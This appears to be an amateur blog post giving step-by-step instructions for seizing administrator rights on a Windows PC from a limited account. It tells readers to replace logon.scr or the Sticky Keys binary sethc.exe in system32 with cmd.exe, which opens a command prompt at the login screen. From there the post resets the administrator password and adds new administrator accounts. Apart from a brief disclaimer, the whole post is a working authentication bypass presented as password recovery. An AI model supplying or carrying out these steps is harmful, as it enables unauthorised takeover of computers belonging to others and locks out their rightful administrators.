Hy guys, I want to discuss with you how to hack you home pc administrator password. Usually, your home pc administrator use limit use account for security purpose. You might be saw that you can’t install any program to limited account and your activities are always limit. If the administrator forget that password anyhow then its too difficult to control pc even if you set up your computer again and for that you might lost your data. Your can promote a user to administrator to get ride of from this problem by using this trick.
First open CMD (Command Mode) .
Type ‘ cd\ ‘ and press ENTER
Type ” c ” and pres ENTER
Type ” cd windows\system32 ” and pres ENTER
Type ” copy logon.scr logon.old ” and pres ENTER
Type ” copy cmd.exe logon.scr ” and pres ENTER
Now restart your computer and wait without logging on to any account. After a several time a command promote will be appear if the promote isn’t appear please follow the following rule.
Type ” cd\ ” and press ENTER
Type ” c: ” and press ENTER
Type ” cd windows\system32 ” and press ENTER
Type ” copy sethc.exe sethc.old ” and press ENTER
Type “copy cmd.exe sethc.exe ” and press ENTER
Now again restart your computer and press SHIFT 5 times without logging on to your computer. A command promote will be appeared.
You can change administrator password, add new user, add new administrator, promote any user to administrator, maintain your users from here. To change existing administrator password type ” net user administrator 2008 ” and your password will be ” 2008 “. Adding a new user, ” type net user username /add ” and username will be added. Add new administrator: ” net localgroup administrator username /add ” ” username ” goes to be administrator.
You can use this trick if you fall in problem. Don’t try to hack anyone’s computer by using it. I will be backed with my next tune. Thanks to IM.
click here for more info
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